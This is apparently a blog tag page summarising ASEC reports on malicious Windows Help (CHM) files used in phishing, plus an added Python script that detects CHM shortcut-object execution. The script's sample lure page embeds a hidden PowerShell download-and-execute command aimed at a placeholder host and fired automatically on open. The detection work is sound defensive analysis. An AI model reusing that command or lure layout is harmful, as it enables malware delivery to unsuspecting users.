chm

AgentTesla Being Distributed Through Windows Help File (*.chm)

The ASEC analysis team recently discovered AgentTesla being distributed with a new method. The AgentTesla samples discussed in earlier ASEC blog posts were distributed through malicious VBA macros inside PowerPoint files (*.ppt). The new method uses Windows Help files (*.chm) to run PowerShell commands. The malicious CHM files are distributed as compressed attachments to phishing emails imitating messages from DHL, a transport company. As phishing emails disguised as other topics are also being distributed, users need to…
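As an added example (not code from ASEC or from the posts listed here), the script below triages the execution technique the CHM entries on this page describe: a compiled HTML Help file whose page embeds the HTML Help "shortcut" ActiveX control (HHCtrl, CLSID adb880a6-d8ff-11cf-9377-00aa003b7a11) with an Item1 parameter naming a program and its arguments, which script then triggers via `.Click()` so the command runs when the help file is opened. The CLSID and the `ShortCut`/`Item1` layout are documented HTML Help behaviour; the sample page is constructed for this example and is not taken from any real sample. On a real file, decompile first with `hh.exe -decompile <outdir> <sample.chm>` and point `scan_decompiled_dir` at the output.

```python
"""Find HTML Help shortcut objects (the CHM command-execution primitive) in decompiled CHM pages."""
from __future__ import annotations

import re
from html.parser import HTMLParser
from pathlib import Path, PureWindowsPath

# Documented CLSID of the HTML Help ActiveX control (HHCtrl); its "ShortCut" command launches a program.
SHORTCUT_CLSID = "adb880a6-d8ff-11cf-9377-00aa003b7a11"
# Interpreters and LOLBins that a help page has no legitimate reason to launch.
SUSPICIOUS_PROGRAMS = ("powershell", "pwsh", "cmd", "mshta", "wscript", "cscript",
                       "rundll32", "regsvr32", "certutil", "bitsadmin")


class _ShortcutParser(HTMLParser):
    """Collects <OBJECT> elements with their <PARAM>s and records which ids get .Click() in script."""

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.objects: list[dict] = []
        self.click_targets: set[str] = set()
        self._current: dict | None = None

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "object":
            clsid = a.get("classid", "").lower().replace("clsid:", "")
            self._current = {"id": a.get("id", ""), "clsid": clsid, "params": {}}
        elif tag == "param" and self._current is not None:
            self._current["params"][a.get("name", "").lower()] = a.get("value", "")

    def handle_endtag(self, tag):
        if tag == "object" and self._current is not None:
            self.objects.append(self._current)
            self._current = None

    def handle_data(self, data):
        # <script> bodies arrive here; "<id>.Click()" fires the shortcut without user interaction.
        for m in re.finditer(r"(\w+)\.Click\(\)", data):
            self.click_targets.add(m.group(1))


def find_chm_shortcuts(html: str) -> list[dict]:
    """Return every shortcut object in one page: id, program, arguments, auto_click, suspicious."""
    p = _ShortcutParser()
    p.feed(html)
    p.close()
    findings = []
    for obj in p.objects:
        if obj["clsid"] != SHORTCUT_CLSID or obj["params"].get("command", "").lower() != "shortcut":
            continue
        # Item1 is ",<program>,<arguments>"; the first field is a window class and is usually empty.
        fields = obj["params"].get("item1", "").split(",", 2)
        program = fields[1].strip() if len(fields) > 1 else ""
        arguments = fields[2].strip() if len(fields) > 2 else ""
        findings.append({
            "id": obj["id"],
            "program": program,
            "arguments": arguments,
            "auto_click": obj["id"] in p.click_targets,
            "suspicious": PureWindowsPath(program).stem.lower() in SUSPICIOUS_PROGRAMS,
        })
    return findings


def scan_decompiled_dir(root: str | Path) -> list[dict]:
    """Run find_chm_shortcuts over every .htm/.html file under a hh.exe -decompile output tree."""
    results = []
    for path in Path(root).rglob("*"):
        if path.suffix.lower() in (".htm", ".html"):
            for f in find_chm_shortcuts(path.read_text(errors="replace")):
                results.append({"file": str(path), **f})
    return results


# Constructed sample resembling a decompiled lure page; the URL is a placeholder, not a real IOC.
SAMPLE_PAGE = """
<html><head><title>Shipment Notice</title></head><body>
<h1>Your parcel is on hold</h1>
<OBJECT id="x" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
  <PARAM name="Command" value="ShortCut">
  <PARAM name="Button" value="Bitmap::shortcut">
  <PARAM name="Item1" value=",cmd.exe,/c powershell -nop -w hidden -c &quot;iex (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')&quot;">
  <PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
<OBJECT id="help" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">
  <PARAM name="Command" value="ShortCut">
  <PARAM name="Item1" value=",notepad.exe,readme.txt">
</OBJECT>
</body></html>
"""

if __name__ == "__main__":
    import json
    print(json.dumps(find_chm_shortcuts(SAMPLE_PAGE), indent=2))
```

A shortcut whose program is an interpreter and whose id is clicked from script is the combination to escalate on; a benign help file may legitimately use the control to open a document, as the second object in the sample does.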

Malicious Help File Disguised as Missing Coins Report and Wage Statement (*.chm)

The ASEC analysis team has discovered a continuous distribution of malware disguised as a Windows Help File (*.chm). The most recent CHM file is identical to the file introduced in <APT Attack Being Distributed as Windows Help File (*.chm)> in the way it downloads additional malware. CHM files of this type appear to be distributed in the form of a compressed file. The confirmed filenames of the compressed files and the CHM files inside them are as follows: Names of Compressed Files…

Backdoor (*.chm) Disguised as Document Editing Software and Messenger Application

The ASEC analysis team confirmed that a backdoor disguised as document editing software and a messenger application widely used by Korean users is being distributed in Korea through malicious CHM files. The team covered malicious CHM files distributed in various forms twice on the ASEC blog in March. The malicious files discussed in this post execute additional malicious files through a process that differs from the previous cases. The names of some CHM files that are currently distributed…

Malicious Help File Disguised as COVID-19 Infectee Notice Being Distributed in Korea

The ASEC analysis team introduced readers to malware that takes the form of a Windows Help file (*.chm) about two weeks ago. The malicious CHM file that was recently discovered is disguised as a notice for people infected with COVID-19 and is being distributed to Korean users. The attacker is probably distributing the file in this form because Korea has recently seen a surge in COVID-19 case numbers. The name of the file that is being distributed is shown…